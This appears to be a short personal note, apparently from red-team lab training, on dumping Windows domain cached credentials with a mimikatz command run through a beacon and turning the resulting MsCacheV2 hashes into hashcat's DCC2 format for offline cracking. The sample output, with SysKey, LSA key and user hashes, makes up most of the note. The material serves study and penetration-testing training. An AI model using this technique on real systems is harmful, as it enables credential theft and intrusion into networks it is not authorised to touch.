dump and crack domain cached credentials

To crack domain cached credentials with hashcat, use the format $DCC2$<iterations>#<username>#<hash>.

For the mimikatz output below, a valid hashcat hash would be $DCC2$10240#DEV\jking#0d50dee9ed3f29d00282168297090d2a.

beacon> mimikatz !lsadump::cache
 
Domain : WKSTN-2
SysKey : b9dc7de8b1972237bbbd7f82d970f79a
 
Local name : WKSTN-2 ( S-1-5-21-2281971671-4135076198-2136761646 )
Domain name : DEV ( S-1-5-21-569305411-121244042-2357301523 )
Domain FQDN : dev.cyberbotic.io
 
Policy subsystem is : 1.18
LSA Key(s) : 1, default {9f88abd7-1cb9-d741-372b-c883b3cbf843}
  [00] {9f88abd7-1cb9-d741-372b-c883b3cbf843} c38164900449d2c6d81b557198ab0cbda2c0ce1c9f57c717cb221032ba1adffb
 
*Iteration is set to default (10240)
 
[NL$1 - 9/1/2022 8:10:06 AM]
RID       : 00000450 (1104)
User      : DEV\bfarmer
MsCacheV2 : 98e6eec9c0ce004078a48d4fd03f2419
 
[NL$2 - 9/1/2022 10:29:19 AM]
RID       : 00000451 (1105)
User      : DEV\jking
MsCacheV2 : 0d50dee9ed3f29d00282168297090d2a

Security Memo

Recent Notes

SMART

Bossa Nova

ZFS

post-rock

2024-09-27

dump and crack domain cached credentials

Graph View

Backlinks